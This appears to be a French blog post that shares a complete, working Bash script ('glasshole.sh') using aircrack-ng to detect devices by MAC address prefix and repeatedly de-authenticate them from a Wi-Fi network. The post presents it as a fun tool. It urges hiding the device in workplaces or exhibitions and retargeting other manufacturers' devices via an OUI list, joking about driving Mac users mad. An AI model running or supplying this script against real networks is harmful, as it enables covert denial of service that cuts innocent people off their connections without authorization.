Un petit script tourne sur le net en ce moment assez sympa je trouve, qui permet de déconnecté des appareils (iphone au pif… ) de leur point d’accès, et en boucle pour que celui-ci ne puisse pas se reconnecté. C’est un simple script Bash qui se lance bien entendu sous Linux. Il nécessite que AirCrack soit installé dans les règles de l’art.
En fait ce script va monitoré le réseau Wifi et dès qu’il va détecté un appareil avec une adresse mac correspondante à celle qu’on lui aura indiqué, il va envoyé un ordre de déconnexion au point d’accès Wifi en spoofant l’adresse mac de la cible, et en boucle .
voici le script en question :
#!/bin/bash
#
# GLASSHOLE.SH
#
# Find and kick Google Glass devices from your local wireless network. Requires
# 'beep', 'arp-scan', 'aircrack-ng' and a GNU/Linux host. Put on a BeagleBone
# black or Raspberry Pi. Plug in a good USB wireless NIC (like the TL-WN722N)
# and wear it, hide it in your workplace or your exhibition.
#
# Save as glasshole.sh, 'chmod +x glasshole.sh' and exec as follows:
#
# sudo ./glasshole.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>
shopt -s nocasematch # Set shell to ignore case
NIC=$1 # Your wireless NIC
BSSID=$2 # Network BSSID (exhibition, workplace, park)
MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
GGMAC='F8:8F:CA:24' # May change as new editions of Google Glass are released
POLL=30 # Check every 30 seconds
airmon-ng stop mon0 # Pull down any lingering monitor devices
airmon-ng start $NIC # Start a monitor device
while true;
do
for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
'([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
do
if [[ $TARGET == *$GGMAC* ]]
then
# Audio alert
beep -f 1000 -l 500 -n 200 -r 2
echo "Glasshole discovered: "$TARGET
echo "De-authing..."
aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
else
echo $TARGET": is not a Google Glass. Leaving alone.."
fi
done
echo "None found this round."
sleep $POLL
done
airmon-ng stop mon0
MAC correspondant au constructeur de la cible.
POLL=30 # Verification toutes les 30 Sec
Voici une liste assez fournis des constructeurs avec leur @MAC :http://www.frameip.com/ethernet-oui-ieee/affichage-ethernet-oui-ieee.php
il y a de quoi rendre fou pas mal de gens … ^^ (les MACeux par example …)
Aucun commentaire:
Enregistrer un commentaire